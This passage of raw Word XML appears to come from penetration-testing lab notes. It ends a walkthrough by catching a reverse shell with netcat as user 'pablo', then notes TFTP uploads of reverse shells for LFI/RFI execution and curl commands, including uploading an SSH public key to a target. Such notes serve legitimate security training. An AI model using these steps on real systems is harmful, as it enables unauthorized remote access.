          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 6379 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The ExecuteCommand module already includes a reverse shell command, so we'll use that to launch our shell.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">system.rev kali 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029AF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Finally, we'll catch our reverse shell as pablo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B0">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B1">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kali@kali:~$ nc -lvp 6379</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B2">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">listening on [any] 6379 ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B3">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">192.168.120.217: inverse host lookup failed: Unknown host</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B4">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">connect to [kali] from (UNKNOWN) [192.168.120.217] 48414</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B6">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">uid=1000(pablo) gid=1000(pablo) groups=1000(pablo)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B7">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B8">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029B9">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029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BB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_s0qbzusr4" w:id="361"/>
      <w:bookmarkEnd w:id="361"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TFTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BD">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If TFTP is connected to a web server, and you have LFI/RFI vulnerability on website, you can go to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var/lib/tftpboot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to find all the files that you can upload to TFTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BE">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029BF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To connect to TFTP:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="541"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">TFTP [IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To Upload files</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="793"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">put [file name]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C5">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C6">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It's a good idea to upload reverse shells and then run it using the LFI/RFI and the file path </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">var/lib/tftpboot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029C7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029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C9">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_n7d1exrqh00w" w:id="362"/>
      <w:bookmarkEnd w:id="362"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to download files using CURL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For GitHub releases page, you had to add the "-L" flag to follow re-directs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="794"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -L https://github.com/DominicBreuker/pspy/releases/download/v1.2.1/pspy64 -o pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="794"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then for GitHub and ExploitDB </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">raw,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> you just do</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> curl &lt;url&gt; -o newFileName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029CF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl websites:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="383"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl [URL]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://[MACHINE_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D2">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to do upload text files to forms using curl:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="702"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is seen in the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play Amaterasu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="702"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -F file=</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">@id_alfredo.pub</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://192.168.56.101:33414/file-upload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="702"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The "@" basically means don't directly use the string "id_alfredo.pub" as the argument, but rather, actually read the content of "id_alfredo.pub" (a local file) and then use that as the argument </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D7">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D8">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Curl HTTP headers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029D9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1332"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I [URL]</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -I http://[MACHINE_IP]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1332"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"-I" stands for HEAD request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DB">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1332"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It instructs curl to send an HTTP HEAD request to the specified URL, instead of the default GET request</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DC">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DD">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy text (ex. code) from websites and put it into local file:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000029DE">
      <w:pPr>
